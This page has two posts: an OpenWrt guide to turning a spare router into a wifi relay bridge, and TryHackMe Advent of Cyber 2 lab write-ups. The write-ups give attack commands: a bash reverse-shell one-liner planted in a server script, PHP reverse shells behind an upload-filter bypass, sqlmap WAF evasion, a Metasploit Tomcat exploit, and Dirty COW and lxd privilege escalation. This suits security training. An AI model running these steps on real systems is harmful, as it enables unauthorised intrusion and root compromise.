#openwrt #networking #wifi

Introduction

Despite upping my wifi AP game recently (UniFi nanoHD AP) and improving wifi coverage throughout our home, the downstairs media player just wasn't getting the speeds it was capable of. So, instead of changing up the physical location or changing the home network any further, I decided to get my hands drity with OpenWrt and a spare Archer C7 v2 I had instead. I enjoyed the OpenWrt firmware so much, I wanted to write about it here.

What, Why, How?

OpenWrt is a linux based OS for networking devices. I've only ever used UniFi, Tomato, DD-WRT, and Merlin firmwares in my network devices so I was just looking for a project where I could get my hands dirty with OpenWrt. The opportunity presented itself when I realised I had a) a spare Archer C7 gathering dust and b) the media player downstairs sure could use a signal boost.

The media player downstairs has no external antenna which added to the problems of receiving limited 2.4 and 5ghz wifi signal 🙁. Max was around 20mbps down, 15mbps up. Near the same spot on my phone was getting at least 100/30!

The idea in my head was to:

• use the existing unused router and load some custom firmware
• put this device into bridging mode (wifi –> ethernet)
• get the media player to utilise ethernet with the wifi as the “backbone”

A wifi bridge from my understanding is simply bridging the ethernet interface of a device with its WLAN interface/s. This way, ethernet would be switched and relayed out via an existing WLAN network. An existing router and AP do all the heavy lifting e.g. DHCP, DNS, routing. This routing is facilitated by relayd.

General Instructions

Prep:

• target router flashed with openwrt
• patch network cable
• a computer with an ethernet port (or adapter)
• approx 30m

Fortunately, an excellent guide is already available to achieve what I described above:

⭐ https://openwrt.org/docs/guide-user/network/wifi/relay_configuration

The summary of this guide is:

1. go through the initial openwrt setup
2. set up the lan interface with an IP in a different subnet to your home network (e.g 192.168.1.0/24 if you already have a 192.168.0.1/24)
3. join an existing wireless network (wwan)
4. ensure internet connectivity (from openwrt)
5. install relayd and luci-proto-relay
6. add a new relay bridge interface linking lan and wwan together
7. reboot

This should result in all devices attached to the ethernet LAN ports be routed by the relay bridge interface to the main network via an existing wireless network.

Conclusion and Next Steps

The media player now was getting close to 150mbps download and 40mbps upload! Much, much better. Now I can reliably serve files to it wirelessly as well (hopefully soon)! Mission success.

I was really impressed and thankful at the documentation available for this feature by the OpenWrt folks. The firmware is much more polished than I last remembered and would definitely consider switching to this firmware on my other more used network devices.

Next steps:

• set up auto updates of OpenWrt and packages
• see if I can set up a simple file server via the USB port on the Archer C7
• create a shell script equivalent of the above process

Resources

1. OpenWrt for C7 – https://openwrt.org/toh/tp-link/archer-c7-1750
2. Wifi Bridge Guide – https://openwrt.org/docs/guide-user/network/wifi/relay_configuration

Get started with Cyber Security in 25 Days – Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.

https://tryhackme.com/room/adventofcyber2

Here are my writeups! Happy Holidays folks 🎄

Day 1: #Web #Cookies A Christmas Crisis

• modify basic auth cookie to bypass authentication for user santa.
• cookie format is in hexadecimal which is presented as json when decoded.

Day 2: #Web #RCE The Elf Strikes Back

• login using provided ID via GET parameter.
• set up a simple php reverse shell
• bypass upload filter by adding .jpg before true extension.
• set up ncat listener: rlwrap ncat -lvnp $PORT
• visit upload directory and open uploaded php reverse shell.
• get www-data shell and get flag.

Day 3: #Web #Authentication Christmas Chaos

• attempt login and capture login URI.
• utilise burp cluster bomb with 2 payload sets for: username and password.
• run attack and compare response length to find correct credentials.
• login using these credentials for flag

Day 4: #Web #Fuzzing Santa's Watching

• scan for common directories —> find /api
• api file site-log.php used for querying site logs by date
• fuzz probable dates using wfuzz: wfuzz -c -z file,$WORDLIST -u $URI/api/site-log.php?date=FUZZ

Day 5: #Web #SQLi Someone stole Santa's gift list!

• bypass login using basic SQLi payload
• use info provided to launch sqlmap against the search parameter.
• burp –> capture request –> send to repeater –> save request.
• sqlmap -r $saved_request --tamper=space2comment --dump-all -dbms sqlite.
  • space2comment is a WAF bypass method. This can be identified via --identify-waf.
  • other WAF bypasses are available where needed.
• use db dumps to answer all questions.

Day 6: #Web #XSS Be careful with what you wish on a Christmas night

• web app is vulnerable to both reflected and stored XSS.
• OWASP ZAP can be used for automated scanning.
• The original compromise most likely utilised the stored XSS vulnerability and redirected a visitor to a malicious website upon clicking a certain hyperlink (by modifying <a> tags or by doing something like location.replace).

Day 7: #Networking #Wireshark The Grinch Really Did Steal Christmas

We're given 3 pcaps that need to be analysed.

pcap1

• find icmp traffic – type icmp in filter bar
• find all HTTP GET requests – http.request.method == GET
• find web pages visited (HTTP) by specific host – ip.src == 10.10.67.199 && http.request.method == GET

pcap 2

• find plaintext password in ftp traffic – ftp.request.command==PASS
• find encrypted protocol used – statistics > protocol hierarchy (from this we see SSH which is an encrypted protocol)

pcap 3

• recover files sent in the wire – file > export objects > http

Day 8: #Networking #nmap #enumeration What's Under the Christmas Tree?

A quick recap of nmap:

• -sT – TCP scan
• -sS – SYN scan – default
• -A – aggressive scan (includes OS, version, script and traceroute scans)
• --script vuln – scan for common vulnerabilities on open ports
  • additional scripts: enip-info, rdp-ntlm-info, http-enum
  • tip: you can use * as a wildcard when using --script.

Day 9: #Networking #ftp Anyone can be Santa!

• find anonymous ftp directories using nmap $IP -sV --script=ftp-anon
• ftp in and retrieve backup.sh
• set up reverse shell on local host: rlwrap ncat -lnvp 4242
• upload backup script back to the ftp server with an added bash reverse shell: sh -i >& /dev/udp/$THM_IP/4242 0>&1
• we should get a root shell on remote host this way.

Day 10: #Networking #smb Don't be sElfish!

enum4linux -U $IP – enumerate users on SMB server enum4linux -S $IP – enumerate shares on SMB server smbclient //$IP/$ShareName – connect to SMB share

Day 11: #Networking #privesc The Rogue Gnome

• we're given details to log in to ssh as the cmatic user.
• it appears to be a limited account without any sudo access, let's send over LinEnum.sh to automate enumeration for us.
• on the target machine: nc -l -p 1337 > /tmp/LinEnum.sh
• on the attacking machine: nc -w 3 $machineIP 1337 < LinEnum.sh
• The above should send the file from our machine to the target machine via nc (timeout -w at 3 secs)
• SUID enumeration reveals /bin/bash has SUID bit set
• With /bin/bash -p we get a root shell. The -p tells the shell to maintain the euid which in this case is 0 (root) due to SUID.

Day 12: #Networking #initialaccess Ready, Set, Elf

• nmap (-sC -sV)
• we see tomcat 9.0.17 being used
• searching that in exploit-db we find possible code exec CVEs

metasploit:

msfconsole
search CVE-2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
set lhost tun0
set rhost $remotehostIP
set URI $remotehostCGI
check
exploit
shell

the above gets us a user shell. Check privs with run post/windows/gather/win_privs

Day 13: #exploitation Coal for Christmas

• scan machine with nmap – notice telnet
• connect to telnet and log in with creds displayed
• Enumuration tips:
  • cat /etc/*release
  • cat /etc/issue
• Ubuntu 12.04 with kernel 3.2.0-23-generic – vulnerable to dirtyc0w.
• Transfer dirtyc0w source code to target machine and compile
• run and create a root privileged account!

Day 14: #osint Where's Rudolph?

• https://scylla.sh/ – neat place to find dehashed passwords.
• always check the entire post history of an account if possible.

Day 15 & 16: #python

#!/usr/bin/env python3
## TryHackMe Advent Calendar 2020 Day 16
## https://tryhackme.com/room/adventofcyber2

import requests

# The code below assumes an api endpoint with a odd-numbered key that we don't know the value of. The correct value will produce a flag.
# for loop to go over 1-100 key values, step by 2 to have odd numbers only

for api_key in range(1,100,2):
    # print what api key value we are iterating
    print(f"api_key {api_key}")
    # this is the api endoing we are sending requests to
    r = requests.get(f'http://EDITME_THMIP:8000/api/{api_key}')
    # only print text out if there are no failures or protections in place
    if "Error" not in str(r.text) and "PROTECTION" not in str(r.text):
        print(r.text)

Day 19: #SSRF #web The Naughty or Nice List

1. Observe that searches are proxied internally via http://list.hohoho:8080/search.php?name=.
2. Since an internal server is exposed, there are numerous things to do:
   • visit root of the host exposed e.g. http://list.hohoho:8080 via the URI parameter.
   • try different ports for enumeration.
   • check for any app side blocking/filtering e.g. visiting localhost via the proxy. If blocked, consider using localtest.me which resolves to 127.0.0.1 e.g. proxy=http://list.hohoho.localtest.me
   • this could lead to some sensitive exposure.

Day 17 & 18: #reversing #assembly #dotnet ReverseELFneering & The Bits of Christmas

Opening a binary with radare2 – r2 -d <file> Analysing a binary – aa List of functions – afl Print disassembly function – pdf @<function> Breakpoint – db <reference> Run program until breakpoint – dc View contents of memory address – px @<memory address> Move to next instruction – ds View %eax register – dr Reload program – ood

For DotNet applications, ILSpy and Dotpeek are good tools that can be used to decompile .NET applications and potentially view methods that contains information to bypass certain checks or authentication.

Day 20: #powershell PowershELlF to the rescue

Some intro to powershell and navigating the file and directory system:

Get-ChildItem -Path <> -File/-Directory -Hidden -ErrorAction SilentlyContinue The above would look for all items in a specified path that has either hidden files or folders and would not worry about any errors.

Measure-Object Can be piped to provide info on an object like words e.g. Get-Content file.txt | Measure-Object -Word

(Get-Content -Path file.txt)[index] Read something in a file at a specfic position. E.g. ...file.txt)[100] for the 99th character.

Select-String -Path ./Desktop -Pattern '*.txt' Find all txt files within the desktop. Can also be used to search for strings within a file.

Day 21: #forensics #powershell Time for some ELForensics

• ADFS is a part of NTFS and can contain alternate data streams not visible to the user. Calculate MD5: Get-FileHash -Algorithm MD5 <file> View streams: Get-Item -Path file.exe -Stream * Launch the stream/s found: wmic process call create $(Resolve-Path file.exe:streamname)

Day 22: #forensics Elf McEager becomes CyberElf

Data decoding via https://gchq.github.io/CyberChef/

Day 23: #forensics The Grinch strikes again!

• malicious scheduled tasks may often be utilised by ransomware operators.
• volume shadow copy service (VSS) creates “snapshots” of data. This can be interacted with using vssadmin
• for any hidden volumes, they may be able to have a drive path assigned to them and mounted. Checking for hidden files and folders is also advisable in that volume.

Day 24

Find hidden web directories and php pages:

gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt

gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x php

Visit the discovered file upload page and try to upload a reverse PHP shell. A simple file rename to .jpg.php doesn't work. See network connections and notice filter.js. Block this to circumvent the client side filter. Visit the file once shell is uploaded and reverse shell listener is set up.

rlwrap ncat -nlvp 1234

Upgrade shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

After finding the DB creds in the includes folder, connect to it using MySQL client.

$ msql -utron -p
$ show databases;
$ use tron;
$ show tables;
$ select * from users;

We find the user flynn's hashed password which can be cracked via crackstation. Using these credentials, SSH into localhost (or use su flynn). The flyn user is in the lxd group, allowing us to interact with linux containers (lxc).

$ lxc image list # see if there are any images we can use
$ lxc init $IMAGENAME $CONTAINERNAME -c security.privileged=true # create a new priv. container
$ lxc config device add $CONTAINERNAME $DEVICENAME disk source=/ path=/mnt/root recursive=true # add mounted device with path = root
$ lxc start $CONTAINERNAME
$ lxc exec $CONTAINERNAME /bin/sh # connect to the container shell